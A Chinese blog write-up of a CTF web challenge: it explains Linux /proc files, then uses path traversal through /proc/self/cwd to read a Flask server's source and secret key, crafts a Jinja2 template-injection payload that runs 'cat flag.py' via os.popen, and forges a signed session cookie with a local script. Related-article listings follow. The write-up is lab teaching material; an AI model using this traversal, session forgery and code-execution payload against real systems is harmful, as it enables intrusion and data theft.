【第一章 web入门】afr_3——模板注入与proc文件夹

题目来源n1book,buu上的环境

  • 看题

    url中提供了name参数,类似在路径中进行了文件名查询然后展示:

    随便输入一个数字:

    说明肯定题目要求我们利用这个文件读取漏洞。但是输入flag之后显示no permission。所以尝试其他方法。

  • proc目录

    在linux中的proc目录是一种文件系统,但是它是一种虚拟文件系统,存储了当前内核运行状态的一些文件,可以在其中查看到当前系统硬件以及运行进程的信息。

    目录中存在许多数字命名的子目录,数字为当前系统运行进程的进程号:

    用ll命令查看详细信息:

    下面解释进程文件夹中一些重要文件:

    • cmdline:启动当前进程的完成命令

    • environ:指向当前进程的环境变量列表,大写字母为变量名,小写字母为变量值:

    • status:记录当前进程的内存信息

    • cwd:是指向当前进程运行目录的符号链接,访问后能看到指定进程的运行目录:

      可以看到29439号进程的运行路径为/home/jay:

      并且/proc/29439/cwd是直接链接到/home/jay,可以通过/proc/29439/cwd来访问/home/jay下的文件。

    下面解释一下proc目录中常见文件:

    • /proc/cmdline :记录启动时传递至内核的相关信息

    • /proc/net:记录网络相关设置,比如/proc/net/arp就记录了系统的arp表:

    • /proc/self:表示当前进程目录,当某个进程想访问自己的目录时就可以访问该目录,这样就可以省略获取进程pid的过程。

  • 继续看题

    有了上面的背景知识就有了思路,可以看到上面一共三层路径,那么进入/proc/self/environ看看本进程的环境变量:

    http://bc536aa0-1952-405e-9901-7c54ce570dcb.node4.buuoj.cn:81/article?name=../../../proc/self/environ

    这里是一个假的flag。

    继续看一下cmdline看看是哪个程序:

    http://bc536aa0-1952-405e-9901-7c54ce570dcb.node4.buuoj.cn:81/article?name=../../../proc/self/cmdline

    说明进程的启动文件为server.py。

    利用proc/self/cwd查看server.py内容,因为server.py就存储在proc/self/cwd指向的文件夹中:

    http://bc536aa0-1952-405e-9901-7c54ce570dcb.node4.buuoj.cn:81/article?name=../../../proc/self/cwd/server.py

    用chatgpt换行之后:

    #!/usr/bin/python  #声明解释器,如果server.py具有可执行权限,可以直接用./server.py来运行

import os
    
from flask import Flask, render_template, request, url_for, redirect, session, render_template_string
    
from flask_session import Session

app = Flask(__name__)
    
execfile('flag.py')
    
execfile('key.py')
    
FLAG = flag
    
app.secret_key = key

@app.route("/n1page", methods=["GET", "POST"])
    
def n1page():
    
    if request.method != "POST":
    
        return redirect(url_for("index"))
    
    n1code = request.form.get("n1code") or None
    
    if n1code is not None:
    
        n1code = n1code.replace(".", "")
    
        n1code = n1code.replace("_", "")
    
        n1code = n1code.replace("{", "")
    
        n1code = n1code.replace("}", "")
    
    if "n1code" not in session or session['n1code'] is None:
    
        session['n1code'] = n1code
    
    template = None
    
    if session['n1code'] is not None:
    
        template = '''<h1>N1 Page</h1>
    
                    <div class="row">
    
                        <div class="col-md-6 col-md-offset-3 center">
    
                            Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>?
    
                        </div>
    
                    </div>
    
                ''' % session['n1code']
    
    session['n1code'] = None
    
    return render_template_string(template)

@app.route("/", methods=["GET"])
    
def index():
    
    return render_template("main.html")

@app.route('/article', methods=['GET'])
    
def article():
    
    error = 0
    
    if 'name' in request.args:
    
        page = request.args.get('name')
    
    else:
    
        page = 'article'
    
    if page.find('flag') >= 0:
    
        page = 'notallowed.txt'
    
    try:
    
        template = open('/home/nu11111111l/articles/{}'.format(page)).read()
    
    except Exception as e:
    
        template = e
    
    return render_template('article.html', template=template)

if __name__ == "__main__":
    
    app.run(host='0.0.0.0', debug=False)

    在n1page方法里用到了render_template_string()方法,并且也用到了格式化字符串,可以判断这里是存在模板注入的,具体可以参考上一篇博客:Flask模板注入

    分析代码:在这里我们可以看到对我们的输入n1code进行了过滤,没有办法通过传入n1code的值来实现注入,但是可以看到其实渲染的判断条件是session['n1code'],所以如果我们可以直接更改session的值就能直接操控输出,这里session被app.secret_key进行了加密。

  • 编写payload:

    • 查看一下key.py:

      http://7543717c-441a-470f-80c0-a2b53f624208.node4.buuoj.cn:81/article?name=../../../proc/self/cwd/key.py

      输出:

      #!/usr/bin/python key = 'Drmhze6EPcv0fN_81Bj-nA'

      根据Flask模板注入,并在本地的linux系统中进行了测试,object子类下的第101个类中的__builtins__属性中包含了eval函数,因此命令执行的payload为:

      {{''.__class__.__mro__[1].__subclasses__()[100].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("cat flag.py").read()')}}

    • 根据key的值在本地搭建环境进行查看payload对应的加密后session:

      #coding=utf-8
      
from flask import render_template_string
      
from flask import Flask
      
from flask import request,session
      
from flask_session import Session

app=Flask(__name__) #创建flask类
      
app.secret_key='Drmhze6EPcv0fN_81Bj-nA'

@app.route('/',methods=["GET","POST"])#路由
      
def index():
      
   session['n1code']="{{''.__class__.__mro__[1].__subclasses__()[100].__init__.__globals__['__builtins__']['eval']('__import__(\"os\").popen(\"cat flag.py\").read()')}}"
      
   return 'payload:%s'%session['n1code']

if __name__ == '__main__':
      
   app.run('127.0.0.1',port=8000)

      运行脚本,直接复制请求头中的session:

      .eJwdisEKwyAQBX-leFm9SLz2V4wsxtggGBU1hSL-eze5zZs3gyXl8u7Zm40BIBFdtK0hEp01I2plCNu1Pd7Tw4VWy3LbkEJ_yiPmzUb6NCBuV4g9JFpgNPivjWA4-XCWXKnnK8ttZUKWXHyi5Wx_faI9ZPndunq7cwFiTjb_PN82fA.ZED8dA.1QLwolkHh8ufM6dBgE065DdKDQo

总结

  • proc系统环境的查看

  • flask模板注入

参考链接

proc文件系统:[https://www.cnblogs.com/DswCnblog/p/5780389.html]

【第一章 web入门】afr_3——模板注入与proc文件夹的更多相关文章

  1. Java Persistence with MyBatis 3(中文版) 第一章 MyBatis入门

    本章将涵盖以下话题: ž  MyBatis是什么? ž  为什么选择MyBatis? ž  MyBatis安装配置 ž  域模型样例 1.1 MyBatis是什么 MyBatis是一个简化和实现了Ja ...

  2. 第一章 Kubernetes入门

    第一章 Kubernetes入门 kubernetes是基于容器技术的分布式架构领先方案,是一个完备的分布式系统支撑平台. kubernetes带来的好处:1)全面拥抱微服务:2)统可以随时随地整体“ ...

  3. MySQL----MySQL数据库入门----第一章 数据库入门

    第一章 数据库入门 1.1 数据库基础知识 1.1.1 数据库概述 数据不仅包括普通意义上的数字,还包括文字.图像.声音等.也就是说,凡是在计算机中用来描述事物的记录都可称作数据. 数据库的基本特点: ...

  4. Kettle解决方案: 第一章ETL入门

    第一章ETL入门 1.1 OLPT和数据仓库对比 普通的事务系统和商业智能系统(BI)有什么区别? 1个独立的普通事务系统也被称为在线事务处理系统(OLTP) 商业智能系统也常被称为决策支持系统(DS ...

  5. Go Web 编程 第一章 Web相关概念

    第一章 Go与Web应用 Go学习群:415660935 1.1 Web应用 在计算机的世界里,应用(application)是一个与用户进行交互,并完成用户特定任务的软件程序.而Web应用则是部署在 ...

  6. mvc_第一章后入门_第一遍_控制器和视图

    在掌握了数据库访问方法之后,我们来看几个mvc的入门程序,借此熟悉mvc的常见工作方式. 一.创建项目,显示一个最简单的页面. 要点:1.为了突出重点,不使用模版:2.项目类型为mvc,便于获得vs添 ...

  7. 第一章 web应用程序开发原理

    [总结] 1.计算机模式  :主机  哑端计算机模式 优点:速度快  反应快 维护修理方便 数据安全性高 缺点:单台计算机安全操作 应用程序难维护 难以跨出平台 客户端 客户计算机模式 优点:速度快 ...

  8. Android初级教程理论知识(第一章快速入门)

    一.综合介绍. Android项目的目录结构 Activity:应用被打开时显示的界面 src:项目代码 R.java:项目中所有资源文件的资源id Android.jar:Android的jar包, ...

  9. Hadoop入门进阶步步高(二)-文件夹介绍

    二.Hadoop文件夹结构 这里重点介绍几个文件夹bin.conf及lib文件夹. 1.$HADOOP_HOME/bin文件夹 文件名 说明 hadoop 用于运行hadoop脚本命令,被hadoop ...

  10. Knockout应用开发指南 第一章:入门

    2011-11-21 14:20 by 汤姆大叔, 20165 阅读, 17 评论, 收藏,  编辑 1    Knockout简介 (Introduction) Knockout是一个轻量级的UI类 ...

随机推荐

  1. MySQL 中分区表

    MySQL 中的分区表 InnoDB 逻辑存储结构 表空间 (Tablespace) 段 (segment) 区 (extent) 页 (page) 行 (row) InnoDB 数据页结构 分区别表 ...

  2. 微信小程序 npm包、全局数据共享、分包

    [黑马程序员前端微信小程序开发教程,微信小程序从基础到发布全流程_企业级商城实战(含uni-app项目多端部署)] https://www.bilibili.com/video/BV1834y1676 ...

  3. Vmware安装Deepin20

    一.搭建环境 虚拟机:Vmware Workstation pro 17 Windows版本 镜像:Deepin 20 二.创建虚拟机 1.点击创建新的虚拟机,选择典型 2.选择稍后安装 3.选择li ...

  4. kubernetes(k8s):解决不在同一网段加入集群失败问题

    执行下面命令,将内外网进行映射. iptables -t nat -A OUTPUT -d 10.140.128.121 -j DNAT --to-destination 10.170.129.153 ...

  5. 【SpringBoot】注解

    Controller - @RestController - @RequestMapping("/path") Controller内方法 @GetMapping("/p ...

  6. 一键配置 Linux 环境:zsh + tmux + vim

    默认使用root用户进行安装,整个流程优化过之后,如下 curl -sSL http://119.3.1.43/pub/sh/init-terminal.sh | bash -x # 安装完成之后,重 ...

  7. 使用JMeter连接达梦数据库的步骤和示例

    引言: 本文将介绍如何使用JMeter连接达梦数据库,并提供连接达梦数据库的步骤和示例,帮助您快速开始进行数据库性能测试. 步骤: 1. 下载并安装JMeter:首先,从JMeter官方网站下载并安装 ...

  8. 因为此网站发送了 Google Chrome 无法处理的杂乱凭据

    原文地址 thisisunsafe this is unsafe 这是不安全的,呵呵~ 具体描述 在chrome该页面上,直接键盘敲入这11个字符:thisisunsafe (鼠标点击当前页面任意位置 ...

  9. [kubernetes]集群中部署CoreDNS服务

    前言 从k8s 1.11版本开始,k8s集群的dns服务由CoreDNS提供.之前已经使用二进制文件部署了一个三master三node的k8s集群,现在需要在集群内部部署DNS服务. 环境信息 IP ...

  10. Web攻防--xxe实体注入

    web攻防--xxe实体注入 漏洞简介 XML 外部实体注入(也称为 XXE)是一种 Web 安全漏洞,允许攻击者干扰应用程序对 XML 数据的处理.它通常允许攻击者查看应用程序服务器文件系统上的文件 ...